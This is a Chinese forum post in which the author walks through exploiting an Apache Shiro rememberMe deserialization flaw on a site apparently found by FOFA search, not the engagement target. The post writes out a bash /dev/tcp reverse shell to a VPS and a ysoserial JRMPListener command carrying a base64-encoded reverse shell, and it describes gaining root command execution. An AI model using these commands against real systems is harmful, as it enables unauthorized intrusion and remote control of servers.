前段时间在项目上HW,被Apache Shiro反序列化漏洞拿到了root权限,心里一阵难受,等我再去验证复现时候,甲方已经修复了,只能自己去网站上找了。
先掏出我的fofa查找一下,使用Shiro的框架,进行测试
在登录界面进行抓包,存在rememberMe=deleteMe证明是Shiro框架
使用工具测试一下,是不是存在可破解秘钥
获取到密码进行反编译利用
记录秘钥,尝试执行命令
神奇!!!可以看到当前用户是root,好激动!!!
于是尝试去反弹shell,由于是公网地址,现在需要准备一个VPS
然后我们来构造payload来进行反弹shell的操作
写好反弹shell的命令bash -i >& /dev/tcp/*.*.*.*(公网VPS地址)/111 0>&1
然后转换成加密后的指令(http://www.jackson-t.ca/runtime-exec-payloads.html)
将指令合成为一个java的监听指令java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1111 CommonsCollections2 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwLjEwMS82NjYgMD4mMQ==}|{base64,-d}|{bash,-i}'
运行它开启java一个监听端口
再开启一个终端监听111端口
生成存在payload的cookie
在burp中抓包,添加参数remenberme到cookie中,发送服务器
在nc监听处反弹到shell,但是我失败了,各位大佬有好的建议希望可以联系我!!!
用户名 | 金币 | 积分 | 时间 | 理由 |
---|---|---|---|---|
veek | 30.00 | 0 | 2020-12-18 11:11:37 | 可以去漏洞复现靶场练手 |
打赏我,让我更有动力~
© 2016 - 2023 掌控者 All Rights Reserved.